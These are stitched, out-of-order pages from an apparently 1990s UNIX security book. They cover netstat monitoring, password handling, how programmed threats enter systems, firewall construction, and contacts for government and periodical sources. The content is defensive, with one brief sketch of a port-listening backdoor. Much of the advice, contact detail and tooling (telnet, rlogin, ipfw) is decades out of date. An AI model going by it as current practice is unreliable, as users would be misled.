file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch20_03.htm (2 of 2) [2002-04-12 10:45:45]


[Appendix F] F.2 U. S. Government Organizations<br />

Appendix F<br />

Organizations<br />

F.2 U. S. Government Organizations<br />

F.2.1 National Institute of Standards and Technology (NIST)<br />

The National Institute of Standards and Technology (formerly the National Bureau of Standards) has<br />

been charged with the development of computer security standards and evaluation methods for<br />

applications not involving the Department of Defense (DoD). Its efforts include research as well as<br />

developing standards.<br />

More information on NIST's activities can be obtained by contacting:<br />

NIST Computer <strong>Sec</strong>urity Division A-216<br />

Gaithersburg, MD 20899<br />

+1-301- 975-3359<br />

http://www.nist.gov<br />

NIST operates the Computer <strong>Sec</strong>urity Resource Clearinghouse:<br />

http://csrc.ncsl.nist.gov/<br />

NIST also operates the National Technical Information Service from which you can order a variety of<br />

security publications. See Appendix D for details.<br />

F.2.2 National <strong>Sec</strong>urity Agency (NSA)<br />

One complimentary copy of each volume in the "Rainbow Series" of computer security standards can be<br />

obtained from the NSA. The NSA also maintains lists of evaluated and certified products. You can<br />

contact them at:<br />

Department of Defense<br />

National <strong>Sec</strong>urity Agency<br />

ATTN: S332<br />

9800 Savage Road<br />

Fort George Meade, MD 20755-6000<br />

+1 301-766-8729<br />

http://www.nsa.gov:8080<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appf_02.htm (1 of 2) [2002-04-12 10:45:46]


[Appendix F] F.2 U. S. Government Organizations<br />

In addition to other services, the NSA operates the National Cryptologic Museum in Maryland. An<br />

online museum is located at:<br />

http://www.nsa.gov:8080/museum<br />

F.1 Professional<br />

Organizations<br />

F.3 Emergency Response<br />

Organizations<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appf_02.htm (2 of 2) [2002-04-12 10:45:46]


[Chapter 17] 17.5 Monitoring Your Network with netstat<br />

Chapter 17<br />

TCP/IP Services<br />

17.5 Monitoring Your Network with netstat<br />

You can use the netstat command to list all of the active and pending TCP/IP connections between your machine and<br />

every other machine on the <strong>Internet</strong>. This command is very important if you suspect that somebody is breaking into your<br />

computer or using your computer to break into another one. netstat lets you see which machines your machine is talking<br />

to over the network. The command's output includes the host and port number of each end of the connection, as well as<br />

the number of bytes in the receive and transmit queues. If a port has a name assigned in the /etc/services file, netstat will<br />

print it instead of the port number.<br />

Normally, the netstat command displays <strong>UNIX</strong> domain sockets in addition to IP sockets. You can restrict the display to<br />

IP sockets only by using the -f inet option.<br />

Sample output from the netstat command looks like this:<br />

charon% netstat -f inet<br />

Active <strong>Internet</strong> connections<br />

Proto Recv-Q Send-<br />

Q Local Address Foreign Address (state)<br />

tcp 0 0 CHARON.MIT.EDU.telnet GHOTI.LCS.MIT.ED.1300 ESTABLISHED<br />

tcp 0 0 CHARON.MIT.EDU.telnet amway.ch.apollo..4196 ESTABLISHED<br />

tcp 4096 0 CHARON.MIT.EDU.1313 E40-008-7.MIT.ED.telne ESTABLISHED<br />

tcp 0 0 CHARON.MIT.EDU.1312 MINT.LCS.MIT.EDU.6001 ESTABLISHED<br />

tcp 0 0 CHARON.MIT.EDU.1309 MINT.LCS.MIT.EDU.6001 ESTABLISHED<br />

tcp 0 0 CHARON.MIT.EDU.telnet MINT.LCS.MIT.EDU.1218 ESTABLISHED<br />

tcp 0 0 CHARON.MIT.EDU.1308 E40-008-7.MIT.ED.telne ESTABLISHED<br />

tcp 0 0 CHARON.MIT.EDU.login RING0.MIT.EDU.1023 ESTABLISHED<br />

tcp 0 0 CHARON.MIT.EDU.1030 *.* LISTEN<br />

NOTE: The netstat program only displays abridged hostnames, but you can use the -n flag to display the IP<br />

address of the foreign machine.<br />

The first two lines of this output indicate Telnet connections between the machines GHOTI.LCS.MIT.EDUu and<br />

AMWAY.CH.APOLLO.COM and the machine CHARON.MIT.EDU. Both of these connections originated at the remote<br />

machine and represent interactive sessions currently being run on CHARON; you can tell this because these ports are<br />

greater than 1023 and are connected to the Telnet port. (They may or may not be unnamed.) Likewise, the third Telnet<br />

connection, between CHARON and E40-008-7.MIT.EDU, originated at CHARON to the machine E40-008-7. The next<br />

two lines are connections to port 6001 (the X Window Server) on MINT.LCS.MIT.EDU. There is a Telnet from MINT to<br />

CHARON, one from CHARON to E40-008-7.MIT.EDU, and an rlogin from RINGO.MIT.EDU to CHARON. The last<br />

line indicates that a user program running on CHARON is listening for connections on port 1030. If you run netstat on<br />

your computer, you are likely to see many connections. If you use the X Window System, you may also see "<strong>UNIX</strong><br />

domain sockets" that are the local network connections from your X clients to the X Window Server.<br />

With the -a option, netstat will also print a list of all of the TCP and UDP sockets to which programs are listening. Using<br />

the -a option will provide you with a list of all the ports that programs and users outside your computer can use to enter<br />

the system via the network. (Unfortunately, netstat will not give you the name of the program that is listening on the<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch17_05.htm (1 of 2) [2002-04-12 10:45:46]


[Chapter 17] 17.5 Monitoring Your Network with netstat<br />

socket.)[20]:<br />

[20] But the lsof command will. See the discussion about lsof in Chapter 25, Denial of Service Attacks and<br />

Solutions.<br />

charon% netstat -a -f inet<br />

Active <strong>Internet</strong> connections<br />

Proto Recv-Q Send-<br />

Q Local Address Foreign Address (state)<br />

Previous netstat printout<br />

...<br />

tcp 0 0 *.telnet *.* LISTEN<br />

tcp 0 0 *.smtp *.* LISTEN<br />

tcp 0 0 *.finger *.* LISTEN<br />

tcp 0 0 *.printer *.* LISTEN<br />

tcp 0 0 *.time *.* LISTEN<br />

tcp 0 0 *.daytime *.* LISTEN<br />

tcp 0 0 *.chargen *.* LISTEN<br />

tcp 0 0 *.discard *.* LISTEN<br />

tcp 0 0 *.echo *.* LISTEN<br />

tcp 0 0 *.exec *.* LISTEN<br />

tcp 0 0 *.login *.* LISTEN<br />

tcp 0 0 *.shell *.* LISTEN<br />

tcp 0 0 *.ftp *.* LISTEN<br />

udp 0 0 *.time *.*<br />

udp 0 0 *.daytime *.*<br />

udp 0 0 *.chargen *.*<br />

udp 0 0 *.discard *.*<br />

udp 0 0 *.echo *.*<br />

udp 0 0 *.ntalk *.*<br />

udp 0 0 *.talk *.*<br />

udp 0 0 *.biff *.*<br />

udp 0 0 *.tftp *.*<br />

udp 0 0 *.syslog *.*<br />

charon%<br />

NOTE: There are weaknesses in the implementation of network services that can be exploited so that one<br />

machine can masquerade temporarily as another machine. There is nothing that you can do to prevent this<br />

deception, assuming that the attacker gets the code correct and has access to the network. This kind of<br />

"spoof" is not easy to carry out, but toolkits are available to make the process easier. Some forms of<br />

spoofing may require physical access to your local network, but others may be done remotely. All require<br />

exact timing of events to succeed. Such spoofs are often impossible to spot afterwards.<br />

17.4 <strong>Sec</strong>urity Implications of<br />

Network Services<br />

17.6 Network Scanning<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch17_05.htm (2 of 2) [2002-04-12 10:45:46]


[Chapter 17] 17.7 Summary<br />

17.7 Summary<br />

Chapter 17<br />

TCP/IP Services<br />

A network connection lets your computer communicate with the outside world, but it can also permit<br />

attackers in the outside world to reach into your computer and do damage. Therefore:<br />

●<br />

●<br />

●<br />

●<br />

Decide whether or not the convenience of each <strong>Internet</strong> service is outweighed by its danger.<br />

Know all of the services that your computer makes available on the network and remove or disable<br />

those that you think are too dangerous.<br />

Pay specific attention to trap doors and Trojan horses that could compromise your internal<br />

network. For example, decide whether or not your users should be allowed to have .rhosts files. If<br />

you decide that they should not have such files, delete the files, rename the files, or modify your<br />

system software to disable the feature.<br />

Educate your users to be suspicious of strangers on the network.<br />

17.6 Network Scanning 18. WWW <strong>Sec</strong>urity<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch17_07.htm [2002-04-12 10:45:46]


[Chapter 19] RPC, NIS, NIS+, and Kerberos<br />

Chapter 19<br />

19. RPC, NIS, NIS+, and Kerberos<br />

Contents:<br />

<strong>Sec</strong>uring Network Services<br />

Sun's Remote Procedure Call (RPC)<br />

<strong>Sec</strong>ure RPC (AUTH_DES)<br />

Sun's Network Information Service (NIS)<br />

Sun's NIS+<br />

Kerberos<br />

Other Network Authentication Systems<br />

In the mid-1980s, Sun Microsystems developed a series of network protocols - Remote Procedure Call<br />

(RPC), the Network Information System (NIS, and previously known as Yellow Pages or YP[1]), and the<br />

Network Filesystem (NFS) - that let a network of workstations operate as if they were a single computer<br />

system. RPC, NIS, and NFS were largely responsible for Sun's success as a computer manufacturer: they<br />

made it possible for every computer user at an organization to enjoy the power and freedom of an<br />

individual, dedicated computer system, while reaping the benefits of using a system that was centrally<br />

administered.<br />

[1] Sun stopped using the name Yellow Pages when the company discovered that the name<br />

was a trademark of British Telecom in Great Britain. Nevertheless, the commands continue<br />

to start with the letters "yp."<br />

Sun was not the first company to develop a network-based operating system, nor was Sun's approach<br />

technically the most sophisticated. One of the most important features that was missing was security:<br />

Sun's RPC and NFS had virtually none, effectively throwing open the resources of a computer system to<br />

the whims of the network's users.<br />

Despite this failing (or perhaps, because of it), Sun's technology soon became the standard. Soon the<br />

University of California at Berkeley developed an implementation of RPC, NIS, and NFS that<br />

interoperated with Sun's. As <strong>UNIX</strong> workstations became more popular, other companies, such as HP,<br />

Digital, and even IBM either licensed or adopted Berkeley's software, licensed Sun's, or developed their<br />

own.<br />

Over time, Sun developed some fixes for the security problems in RPC and NFS. Meanwhile, a number<br />

of other competing and complementary systems - for example, Kerberos and DCE - were developed for<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch19_01.htm (1 of 3) [2002-04-12 10:45:46]


[Chapter 19] RPC, NIS, NIS+, and Kerberos<br />

solving many of the same problems. As a result, today's system manager has a choice of many different<br />

systems for remote procedure calls and configuration management, each with its own trade-offs in terms<br />

of performance, ease of administration, and security. This chapter describes the main systems available<br />

today and makes a variety of observations on system security. For a full discussion of NFS, see Chapter<br />

20, NFS.<br />

19.1 <strong>Sec</strong>uring Network Services<br />

Any system that is designed to provide services over a network needs to have several fundamental<br />

capabilities:<br />

●<br />

●<br />

●<br />

A system for storing information on a network server<br />

A mechanism for updating the stored information<br />

A mechanism for distributing the information to other computers on the network<br />

Early systems performed these functions and little else. In a friendly network environment, these are the<br />

only capabilities that are needed.<br />

However, in an environment that is potentially hostile, or when an organization's network is connected<br />

with an external network that is not under that organization's control, security becomes a concern. To<br />

provide some degree of security for network services, the following additional capabilities are required:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Server authentication. Clients need to have some way of verifying that the server they are<br />

communicating with is a valid server.<br />

Client authentication. Servers need to know that the clients are in fact valid client machines.<br />

User authentication. There needs to be a mechanism for verifying that the user sitting in front of<br />

a client workstation is in fact who the user claims to be.<br />

Data integrity. A system is required for verifying that the data received over the network has not<br />

been modified during its transmission.<br />

Data confidentiality. A system is required for protecting information sent over the network from<br />

eavesdropping.<br />

These capabilities are independent from one another. A system can provide for client authentication and<br />

user authentication, but also require that the clients implicitly trust that the servers on the network are, in<br />

fact, legitimate servers. A system can provide for authentication of the users and the computers, but send<br />

all information without encryption or digital signatures, making it susceptible to modification or<br />

monitoring en route.<br />

Obviously, the most secure network systems provide all five network security capabilities.<br />

18.7 Summary 19.2 Sun's Remote Procedure<br />

Call (RPC)<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch19_01.htm (2 of 3) [2002-04-12 10:45:46]


[Chapter 19] RPC, NIS, NIS+, and Kerberos<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch19_01.htm (3 of 3) [2002-04-12 10:45:46]


[Chapter 11] 11.4 Entry<br />

11.4 Entry<br />

Chapter 11<br />

Protecting Against Programmed<br />

Threats<br />

The most important question that arises in our discussion of programmed threats is: How do these threats<br />

find their way into your computer system and reproduce? Most back doors, logic bombs, Trojan horses,<br />

and bacteria appear on your system because they were written there. Perhaps the biggest security threat<br />

to a computer system is its own user group. Users understand the system, know its weaknesses, and know<br />

the auditing and control systems that are in place. Legitimate users often have access with sufficient<br />

privilege to write and introduce malicious code into the system. Especially ironic, perhaps, is the idea<br />

that at many companies the person responsible for security and control is also the person who could<br />

cause the most damage if he wished to issue the appropriate commands.<br />

Users also may be unwitting agents of transmission for viruses, worms, and other such threats. They may<br />

install new software from outside, and install embedded malicious code at the same time. Software<br />

obtained from public domain sources traditionally has been a source of system infection. Not all public<br />

domain software is contaminated, of course; most of it is not. Commercial products also have been<br />

known to be infected. The real difficulties occur when employees do not understand the potential<br />

problems that may result from the introduction of software that has not been checked thoroughly, no<br />

matter what its source. Such software includes the "click-and-download" paradigm of WWW browsers.<br />

A third possible method of entry occurs if a machine is connected to a network or some other means of<br />

computer-to-computer communication. Programs may be written on the outside and find their way into a<br />

machine through these connections. This is the way worms usually enter systems. Worms may carry<br />

logic bombs or viruses with them, thus introducing those problems into the computer at the same time.<br />

Programmed threats can easily enter most machines. Environments with poor controls abound, caused in<br />

part by the general lack of security training and expertise within the computing community. Few<br />

college-level programs in computer science and computer engineering even offer an elective in computer<br />

security (or computer ethics), so few computer users - even those with extensive training - have the<br />

background to help safeguard their systems.<br />

No matter how the systems initially became infected, the situation is usually made worse when the<br />

software spreads throughout all susceptible systems within the same office or plant. Most systems are<br />

configured to trust the users, machines, and services in the local environment. Thus, there are even fewer<br />

restrictions and restraints in place to prevent the spread of malicious software within a local cluster or<br />

network of computers. Because the users of such an environment often share resources (including<br />

programs, diskettes, and even workstations), the spread of malicious software within such an<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch11_04.htm (1 of 2) [2002-04-12 10:45:47]


[Chapter 11] 11.4 Entry<br />

environment is hastened considerably. Eradicating malicious software from such an environment is also<br />

more difficult because identifying all sources of the problem is almost impossible, as is purging all those<br />

locations at the same time.<br />

11.3 Authors 11.5 Protecting Yourself<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch11_04.htm (2 of 2) [2002-04-12 10:45:47]


[Chapter 3] 3.7 One-Time Passwords<br />

Chapter 3<br />

Users and Passwords<br />

3.7 One-Time Passwords<br />

The most effective way to minimize the danger of bad passwords is to not use conventional passwords at<br />

all. Instead, your site can install software and/or hardware to allow one-time passwords. A one-time<br />

password is just that - a password that is used only once.<br />

As a user, you may be given a list of passwords on a printout; each time you use a password, you cross it<br />

off the list, and you use the next password on the list the next time you log in. Or you may be given a<br />

small card to carry; the card will display a number that changes every minute. Or you may have a small<br />

calculator that you carry around. When the computer asks you to log in, it will print a number, and you<br />

will type that number into your little calculator, then type in your personal identification number, and<br />

then type to the computer the resulting number that is displayed.<br />

All of these one-time password systems provide an astounding improvement in security over the<br />

conventional system. Unfortunately, because they require either the installation of special programs or<br />

the purchase of additional hardware, they are not widespread at this time in the <strong>UNIX</strong> marketplace.<br />

One-time passwords are explained in greater detail in Chapter 8; that chapter also shows some examples<br />

of one-time password systems available today.<br />

3.6 The Care and Feeding of<br />

Passwords<br />

3.8 Summary<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch03_07.htm [2002-04-12 10:45:47]


[Chapter 3] 3.5 Verifying Your New Password<br />

Chapter 3<br />

Users and Passwords<br />

3.5 Verifying Your New Password<br />

After you have changed your password, try logging into your account with the new password to make<br />

sure that you've entered the new password properly. Ideally, you should do this without logging out, so<br />

you will have some recourse if you did not change your password properly. This is especially crucial if<br />

you are logged in as root and you have just changed the root password.<br />

Forcing a Change of Password<br />

At one major university we know about, it was commonplace for students to change their passwords and<br />

then be unable to log into their accounts. Most often this happened when students tried to put control<br />

characters into their passwords.[7] Other times, students mistyped the password and were unable to<br />

retype it again later. More than a few got so carried away making up a fancy password that they couldn't<br />

remember it later.<br />

[7] The control characters ^@, ^G, ^H, ^J, ^M, ^Q, ^S, and ^[ should probably not be put in<br />

passwords, because they can be interpreted by the system. If your users will log in using<br />

xdm, they should avoid all control characters, as xdm often filters them out. You should also<br />

beware of control characters that may interact with your terminal programs, terminal<br />

concentrator monitors, and other intermediate systems you may use. Finally, you may wish<br />

to avoid the # and @ characters, as some <strong>UNIX</strong> systems still interpret these characters with<br />

their use as erase and kill characters.<br />

Well, once a <strong>UNIX</strong> password is entered, there is no way to decrypt it and recover it. The only recourse is<br />

to have someone change the password to another known value. Thus, the students would bring a picture<br />

ID to the computing center office, where a staff member would change the password to ChangeMe and<br />

instruct them to immediately go down the hall to a terminal room to do exactly that.<br />

Late one semester shortly after the <strong>Internet</strong> worm incident, one of the staff decided to try running a<br />

password cracker (see Chapter 8) to see how many student account passwords were weak. Much to the<br />

surprise of the staff member, dozens of the student accounts had a password of ChangeMe. Furthermore,<br />

at least one of the other staff members also had that as a password! The policy soon changed to one in<br />

which forgetful students were forced to enter a new password on the spot.<br />

Under SVR4, there is an option to the passwd command that can be used by the superuser: -f, (e.g.,<br />

passwd -f nomemory). This forces the user to change his password during the login process the very next<br />

time he logs in to the system. It's a good option for system administrators to remember. (This behavior is<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch03_05.htm (1 of 3) [2002-04-12 10:45:48]


[Chapter 3] 3.5 Verifying Your New Password<br />

the default on AIX. OSF/1 uses the chfn command for this same purpose.)<br />

One way to try out your new password is to use the su command. Normally, the su command is used to<br />

switch to another account. But as the command requires that you type the password of the account to<br />

which you are switching, you can effectively use the su command to test the password of your own<br />

account.<br />

% su nosmis<br />

password: mypassword<br />

%<br />

(Of course, instead of typing nosmis and mypassword, use your own account name and password.)<br />

If you're using a machine that is on a network, you can use the telnet or rlogin programs to loop back<br />

through the network and log in a second time by typing:<br />

% telnet localhost<br />

Trying 127.0.0.1...<br />

Connected to localhost<br />

Escape character is '^]'<br />

artemis login: dawn<br />

password: techtalk<br />

Last login: Sun Feb 3 11:48:45 on ttyb<br />

%<br />

You may need to replace localhost in the above example with the name of your computer.<br />

If you try one of the earlier methods and discover that your password is not what you thought it was, you<br />

have a definite problem. To change the password to something you do know, you will need the current<br />

password. However, you don't know that password! You will need the help of the superuser to fix the<br />

situation. (That's why you shouldn't log out - if the time is 2 a.m. on Saturday, you might not be able to<br />

reach the superuser until Monday morning, and you might want to get some work done before then.)<br />

The superuser (user root) can't decode the password of any user. However, the superuser can help you<br />

when you don't know what you've set your password to by setting your password to something else. If<br />

you are running as the superuser, you can set the password of any user, including yourself, without<br />

supplying the old password. You do this by supplying the username to the passwd command when you<br />

invoke it:<br />

# passwd cindy<br />

New password: NewR-pas<br />

Retype new password: NewR-pas<br />

#<br />

3.4 Changing Your Password 3.6 The Care and Feeding of<br />

Passwords<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch03_05.htm (2 of 3) [2002-04-12 10:45:48]


[Chapter 3] 3.5 Verifying Your New Password<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch03_05.htm (3 of 3) [2002-04-12 10:45:48]


[Chapter 3] 3.8 Summary<br />

3.8 Summary<br />

Chapter 3<br />

Users and Passwords<br />

In this chapter we've discussed how <strong>UNIX</strong> identifies users and authenticates their identity at login. We've<br />

presented some details on how passwords are represented and used. We'll present more detailed technical<br />

information in succeeding chapters on how to protect access to your password files and passwords, but<br />

the basic and most important advice for protecting your system can be summarized as follows:<br />

●<br />

Otherwise:<br />

●<br />

●<br />

●<br />

Use one-time passwords if possible.<br />

Ensure that every account has a password.<br />

Ensure that every user chooses a strong password.<br />

Don't tell your password to other users.<br />

Remember: even if the world's greatest computer cracker should happen to dial up your machine, if that<br />

person is stuck at the login: prompt, the only thing that he or she can do is to guess usernames and<br />

passwords, hoping to hit one combination that is correct. Unless the criminal has specifically targeted<br />

your computer out of revenge or because of special information that's on your system, the perpetrator is<br />

likely to give up and try to break into another machine.<br />

Making sure that users pick good passwords is one of the most important parts of running a secure<br />

computer system.<br />

3.7 One-Time Passwords 4. Users, Groups, and the<br />

Superuser<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch03_08.htm [2002-04-12 10:45:48]


[Chapter 21] 21.2 Building Your Own Firewall<br />

Chapter 21<br />

Firewalls<br />

21.2 Building Your Own Firewall<br />

For years, firewalls were strictly a do-it-yourself affair. A big innovation was the introduction of several<br />

firewall toolkits - ready-made proxies and client programs designed to build a simple, straightforward<br />

firewall system. Lately, a number of companies have started offering complete firewall "solutions."<br />

Today there are four basic types of firewalls in use:<br />

Packet firewalls<br />

These firewalls are typically built from routers that are programmed to pass some types of packets<br />

and to block others.<br />

Traditional proxy-based firewalls<br />

These firewalls require that users follow special procedures or use special network clients that are<br />

aware of the proxies.<br />

Packet-rewriting firewalls<br />

These firewalls rewrite the contents of the IP packets as they pass between the internal network<br />

and the <strong>Internet</strong>. From the outside, all communications appear to be mediated through a proxy on<br />

the firewall. From the inside network, the firewall is transparent.<br />

Screens<br />

These firewalls bisect a single Ethernet with a pair of Ethernet interfaces. The screen doesn't have<br />

an IP address. Instead, each Ethernet interface listens to all packets that are transmitted on its<br />

segment and forwards the appropriate packets, based on a complex set of rules, to the other<br />

interfaces. Because the screen does not have an IP address, it is highly resistant to attack over the<br />

network. For optimal security, the screen should be programmed through a serial interface or<br />

removable media (e.g., floppy disk), although you can design a screen that would be addressed<br />

through its Ethernet interface directly (speaking a network protocol other than IP). Some<br />

manufacturers of screens provide several network interfaces, so that you can set up a WWW server<br />

or a news server on a separate screened subnet using the same screen.<br />

In this section, we will discuss the construction of a firewall built from a choke and a gate that uses<br />

proxies to move information between the internal network and the external network. We describe how to<br />

build this kind of firewall because the tools are readily available, and because this type seems to provide<br />

adequate security for many applications.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch21_02.htm (1 of 4) [2002-04-12 10:45:49]


[Chapter 21] 21.2 Building Your Own Firewall<br />

For additional useful and practical information on constructing your own firewall, we recommend that<br />

you read Building <strong>Internet</strong> Firewalls by D. Brent Chapman and Elizabeth D. Zwicky (<strong>O'Reilly</strong> &<br />

Associates, 1995).<br />

21.2.1 Planning Your Configuration<br />

Before you start purchasing equipment or downloading software from the <strong>Internet</strong> for your firewall, you<br />

might first want to answer some basic questions:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

What am I trying to protect? If you are simply trying to protect two or three computers, you might<br />

find that using host-based security is easier and more effective than going to the expense and<br />

difficulty of building a full-fledged firewall.<br />

Do I want to build my own firewall, or buy a ready-made solution? Although you could build a<br />

very effective firewall, the task is very difficult and one in which a single mistake can lead to<br />

disaster.<br />

Should I buy a monitored firewall service? If your organization lacks the expertise to build its own<br />

firewall, or it does not wish to commit the resources to monitor a firewall 24 hours a day, 7 days a<br />

week, you may find that paying for a monitored firewall service is an economical alternative.<br />

Several ISPS now offer such services as a value-added option to their standard <strong>Internet</strong> offerings.<br />

How much money do I want to spend? You can spend a great deal of money on your own systems,<br />

or on a commercial product. Often (but not always) the extra expense may result in a more capable<br />

firewall.<br />

Is simple packet filtering enough? If so, you can probably set up your "firewall" simply by adding<br />

a few rules to your existing router's configuration files.<br />

If simple packet filtering is not enough, do I want a gate and one choke, or two?<br />

Will I allow inbound Telnet connections? If so, how will I authenticate them? How will I prevent<br />

passwords from being sniffed?<br />

How will I get my users to adhere to the organization's firewall policy?<br />

21.2.2 Assembling the Parts<br />

After you have decided on your configuration, you must then assemble the parts. This assembly includes:<br />

Choke<br />

Gate<br />

Most organizations use a router. You can use an existing router or purchase a special router for the<br />

purpose.<br />

Usually, the gate is a spare computer running the <strong>UNIX</strong> operating system. Gates do not need to be<br />

top-of-the-line workstations, because the speed at which they function is limited by the speed of<br />

your <strong>Internet</strong> connection, not the speed of your computer's CPU. In many cases, a high-end PC can<br />

provide sufficient capacity for your gate.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch21_02.htm (2 of 4) [2002-04-12 10:45:49]


[Chapter 21] 21.2 Building Your Own Firewall<br />

Software<br />

You'll want to get a variety of software to run on the gate. Start with a firewall toolkit, such as the<br />

one from Trusted Information Systems. You should also have a consistency-checking package,<br />

such as Tripwire, to help you detect intrusion. Finally, consider using a package such as Tiger to<br />

help find security weaknesses in the firewall's <strong>UNIX</strong> configuration.<br />

21.2.3 Setting Up the Choke<br />

The choke is the bridge between the inside network and the outside network. It should not forward<br />

packets between the two networks unless the packets have the gate computer as either their destination or<br />

their origination address. You can optionally further restrict the choke so that it forwards only packets for<br />

particular protocols - for example, packets used for mail transfer but not for telnet or rlogin.<br />

There are three main choices for your choke:<br />

1.<br />

2.<br />

3.<br />

Use an "intelligent router." Many of these routers can be set up to forward only certain kinds of<br />

packets and only between certain addresses.<br />

You can use a standard <strong>UNIX</strong> computer with two network interfaces. If you do so, do not run the<br />

program /usr/etc/routed (the network routing daemon) on this computer. Set up the program so that<br />

it does not forward packets from one network interface to the other (usually by setting the kernel ip<br />

forwarding variable to 0).[7] A computer set up in this fashion is both the choke and the gate.<br />

[7] On Linux, IP forwarding is a compile-time option.<br />

You can alter your operating system's network driver so that it only accepts packets from the<br />

internal network and the choke. If you are running Linux, you can use the operating system's<br />

kernel-based IP filtering, accessible through the ipfw command, to prevent the system from<br />

receiving packets from non-approved networks or hosts. In the not too distant future, other vendors<br />

may offer similar features.<br />

The details of how you set up your choke will vary greatly, depending on the hardware you use and that<br />

hardware's software. Therefore, the following sections are only general guidelines.<br />

21.2.4 Choosing the Choke's Protocols<br />

The choke is an intelligent filter: it is usually set up so that only the gate machine can talk to the outside<br />

world. All messages from the outside (whether they're mail, FTP, or attempts to break in) that are<br />

directed to internal machines other than the gate are rejected. Attempts by local machines to contact sites<br />

outside the LAN are similarly denied.<br />

The gate determines destinations, then handles requests or forwards them as appropriate. For instance,<br />

SMTP (mail) requests can be sent to the gate, which resolves local aliases and then sends the mail to the<br />

appropriate internal machine.<br />

Furthermore, you can set up your choke so that only specific kinds of messages are sent through. You<br />

should configure the choke to reject messages using unknown protocols. You can also configure the<br />

choke to specifically reject known protocols that are too dangerous for people in the outside world to use<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch21_02.htm (3 of 4) [2002-04-12 10:45:49]


[Chapter 21] 21.2 Building Your Own Firewall<br />

on your internal computers.<br />

The choke software should carefully examine the option bits that might be set in the header of each IP<br />

packet. Option bits, such as those for IP forwarding, fragmentation, and route recording, may be valid on<br />

some packets. However, they are sometimes set by attackers in an attempt to probe the state of your<br />

firewall or to get packets past a simple choke. Other options, such as source routing, are never<br />

acceptable; packets that specify them should be blocked.<br />

You also want to configure the choke to examine the return addresses (source addresses) on packets.<br />

Packets from outside your network should not state source addresses from inside your network, nor<br />

should they be broadcast or multicast addresses. Otherwise, an attacker might be able to craft packets that<br />

look normal to your choke and clients; in such cases, the responses to these packets are what actually do<br />

the damage.<br />

The choke can also be configured to prevent local users from connecting to outside machines through<br />

unrestricted channels. This type of configuration prevents Trojan-horse programs from installing network<br />

back doors on your local machines. Imagine a public domain data-analysis program that surreptitiously<br />

listens on port 49372 for connections and then forks off a /bin/csh. The configuration also discourages<br />

someone who does manage to penetrate one of your local machines from sending information back to the<br />

outside world.<br />

Ideally, there should be no way to change your choke's configuration from the network. An attacker<br />

trying to tap into your network will be stuck if your choke is a PC-based router that can be<br />

reprogrammed only from its keyboard.<br />

NOTE: The way you configure your choke will depend on the particular router that you are<br />

using for a choke; consult your router's documentation for detail.<br />

21.1 What's a Firewall? 21.3 Example: Cisco Systems<br />

Routers as Chokes<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch21_02.htm (4 of 4) [2002-04-12 10:45:49]


[Appendix D] D.2 <strong>Sec</strong>urity Periodicals<br />

Appendix D<br />

Paper Sources<br />

D.2 <strong>Sec</strong>urity Periodicals<br />

Computer Audit Update,<br />

Computer Fraud & <strong>Sec</strong>urity Update,<br />

Computer Law & <strong>Sec</strong>urity Report,<br />

Computers & <strong>Sec</strong>urity<br />

Elsevier Advanced Technology<br />

Crown House, Linton Rd.<br />

Barking, Essex I611 8JU<br />

England<br />

Voice: +44-81-5945942<br />

Fax: +44-81-5945942<br />

Telex: 896950 APPSCI G<br />

North American Distributor:<br />

P.O. Box 882<br />

New York, NY 10159<br />

Voice: +1-212-989-5800<br />

